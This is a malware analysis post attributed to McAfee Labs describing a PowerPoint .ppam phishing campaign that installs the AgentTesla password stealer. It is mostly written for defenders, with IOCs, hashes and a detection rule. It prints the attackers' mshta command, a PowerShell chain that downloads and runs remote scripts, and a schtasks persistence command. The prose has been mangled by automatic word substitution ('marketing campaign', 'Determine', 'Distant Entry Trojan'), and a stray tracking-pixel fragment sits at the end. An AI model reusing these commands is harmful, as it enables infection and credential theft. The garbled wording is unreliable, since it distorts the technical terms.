[ad_1]
Authored by Anuradha M
McAfee Labs have noticed a brand new phishing marketing campaign that makes use of macro capabilities out there in Microsoft PowerPoint. On this marketing campaign, the spam electronic mail comes with a PowerPoint file as an attachment. Upon opening the malicious attachment, the VBA macro executes to ship variants of AgentTesla which is a well known password stealer. These spam emails purport to be associated to monetary transactions.
AgentTesla is a RAT (Distant Entry Trojan) malware that has been energetic since 2014. Attackers use this RAT as MASS(Malware-As-A-Service) to steal person credentials and different info from victims by way of screenshots, keylogging, and clipboard captures. Its modus operandi is predominantly through phishing campaigns.
Throughout Q2, 2021, now we have seen a rise in PowerPoint malware.
Determine 1. The pattern of PPT malware over the primary half of 2021
On this marketing campaign, the spam electronic mail accommodates an hooked up file with a .ppam extension which is a PowerPoint file containing VBA code. The sentiment used was finance-related themes resembling: “New PO300093 Order” as proven in Determine 2. The attachment filename is “300093.pdf.ppam”.
Determine 2. Spam E mail
PPAM file:
This file sort was launched in 2007 with the discharge of Microsoft Workplace 2007. It is a PowerPoint macro-enabled Open XML add-in file. It accommodates parts that add extra performance, together with further instructions, customized macros, and new instruments for extending default PowerPoint features.
Since PowerPoint helps ‘add-ins’ developed by third events so as to add new options, attackers abuse this characteristic to mechanically execute macros.
Technical Evaluation:
As soon as the sufferer opens the “.ppam” file, a safety discover warning pop-up as proven in Determine 3 to alert the person in regards to the presence of macro.
Determine 3. Warning when opening the hooked up PowerPoint file
From Determine 4, you possibly can see that the Add-in characteristic of the PowerPoint may be recognized from the content material of [Content_Types].xml file which is able to be current contained in the ppam file.
Determine 4. Powerpoint add-in characteristic with macroEnabled
The PPAM file accommodates the next recordsdata and directories which may be seen upon extraction.
_rels.rels
[Content_Types].xml
pptrelspresentation.xml.rels
pptasjdaaasdasdsdaasdsdasasdasddoasddasasddasasdsasdjasddasdoasjdasasddoajsdjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.bin – Malicious file
pptpresentation.xml
As soon as the sufferer permits the macro, the add-in will get put in silently with out person information, which may be seen in Determine 5. On seeing that there isn’t a content material and no slide within the PowerPoint, the person will shut the file however, within the backend, macro code will get executed to provoke the malicious exercise.
Determine 5. Put in Add-ins within the PowerPoint choices
As you possibly can see in Determine 6, the macro is executed inside the add-in auto_open() occasion i.e.., macro is fired instantly after the presentation is opened and the add-in is loaded.
Determine 6.VBA Code snippet with auto_open() occasion
The PowerPoint macro code on execution launches an URL by invoking mshta.exe (Microsoft HTML Software) which is proven in Determine 7. The mshta course of is launched by Powerpoint by calling the CreateProcessA() API.
Beneath are the parameters handed to CreateProcessA() API:
kernel32.CreateProcessA(00000000,mshta hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh,00000000,00000000,00000001,00000020,00000000,00000000,D,
Determine 7. VBA Code snippet containing mshta and url
Beneath is the command line parameter of mshta:
mshta hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh
The URL hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh is redirected to “hxxps://p8hj[.]blogspot[.]com/p/27.html” however it didn’t get any response from “27.html” on the time of study.
Later mshta.exe spawns powershell.exe as a baby course of.
Beneath is the command line parameters of PowerShell:
powershell.exe - ”C:WindowsSystem32WindowsPowerShellv1.0powershell.exe” i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/objects/150-Re-Crypted-25-June/27-1.txt‘) -useB);i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/objects/150-Re-Crypted-25-June/27-2.txt‘) -useB);i’E’x(iwr(‘hxxps://ia801403.us.archive.org/23/objects/150-Re-Crypted-25-June/27-3.txt‘) -useB);
PowerShell downloads and executed script recordsdata from the above-mentioned URLs.
The under Determine 8 exhibits the content material of the first url – “hxxps://ia801403.us.archive.org/23/objects/150-Re-Crypted-25-June/27-1.txt”:
Determine 8. Binary file content material
There are two binary recordsdata saved in two enormous arrays inside every downloaded PowerShell file. The primary file is an EXE file that acts as a loader and the second file is a DLL file, which is a variant of AgentTesla. PowerShell fetches the AgentTesla payload from the URLs talked about within the command line, decodes it, and launches MSBuild.exe to inject the payload inside itself.
Schedule Duties:
To realize persistence, it creates a scheduled activity in “Activity Scheduler” and drops a activity file beneath C:windowssystem32SECOTAKSA to make the complete marketing campaign work successfully.
Determine 9. Code snippet to create a brand new scheduled activity
The brand new activity identify is “SECOTAKSA”. Its motion is to execute the command “mshta hxxp:// //1230948percent1230948@0v2x.blogspot.com/p/27.html” and it’s known as each 80 minutes.
Beneath is the command line parameters of schtasks:
schtasks.exe - “C:WindowsSystem32schtasks.exe” /create /sc MINUTE /mo 80 /tn “”SECOTAKSA”” /F /tr “”””MsHtA””””hxxp://1230948percent1230948@0v2x.blogspot.com/p/27.html“”
An infection Chain:
Determine 10. An infection Chain
Course of Tree:
Determine 11. Course of Tree
Mitigation:
McAfee’s Endpoint Safety (ENS) and Home windows Methods Safety (WSS) product have DAT protection for this variant of malware.
This malicious PPAM doc with SHA256: fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182 is detected as “W97M/Downloader.dkw”.
The PPAM doc can also be blocked by the AMSI characteristic in ENS as AMSI-FKN!
Moreover, the Exploit Prevention characteristic in McAfee’s Endpoint Safety product blocks the an infection chain of this malware by including the under skilled rule in order to shield our prospects from this malicious assault.
Professional Rule authored primarily based on the under an infection chain:
POWERPNT.EXE –> mshta.exe
Professional Rule:
Rule {
Course of {
Embrace OBJECT_NAME { -v “powerpnt.exe” }
}
Goal {
Match PROCESS {
Embrace OBJECT_NAME { -v “mshta.exe” }
Embrace PROCESS_CMD_LINE { -v “**http**” }
Embrace -access “CREATE”
}
}
}
IOCs
URLs:
hxxps://www.bitly.com/asdhodwkodwkidwowdiahsidh
hxxp:// //1230948percent1230948@0v2x.blogspot.com/p/27.html
hxxps://p8hj[.]blogspot[.]com/p/27.html
hxxps://ia801403.us.archive.org/23/objects/150-Re-Crypted-25-June/27-1.txt
hxxps://ia801403.us.archive.org/23/objects/150-Re-Crypted-25-June/27-2.txt
hxxps://ia801403.us.archive.org/23/objects/150-Re-Crypted-25-June/27-3.txt
EML recordsdata:
72e910652ad2eb992c955382d8ad61020c0e527b1595619f9c48bf66cc7d15d3
0afd443dedda44cdd7bd4b91341bd87ab1be8d3911d0f1554f45bd7935d3a8d0
fd887fc4787178a97b39753896c556fff9291b6d8c859cdd75027d3611292253
38188d5876e17ea620bbc9a30a24a533515c8c2ea44de23261558bb4cad0f8cb
PPAM recordsdata:
fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182
6c45bd6b729d85565948d4f4deb87c8668dcf2b26e3d995ebc1dae1c237b67c3
9df84ffcf27d5dea1c5178d03a2aa9c3fb829351e56aab9a062f03dbf23ed19b
ad9eeff86d7e596168d86e3189d87e63bbb8f56c85bc9d685f154100056593bd
c22313f7e12791be0e5f62e40724ed0d75352ada3227c4ae03a62d6d4a0efe2d
Extracted AgentTesla recordsdata:
71b878adf78da89dd9aa5a14592a5e5da50fcbfbc646f1131800d02f8d2d3e99
90674a2a4c31a65afc7dc986bae5da45342e2d6a20159c01587a8e0494c87371
x3Cimg top=”1″ width=”1″ fashion=”show:none” src=”https://www.fb.com/tr?id=766537420057144&ev=PageView&noscript=1″ />x3C/noscript>’);
[ad_2]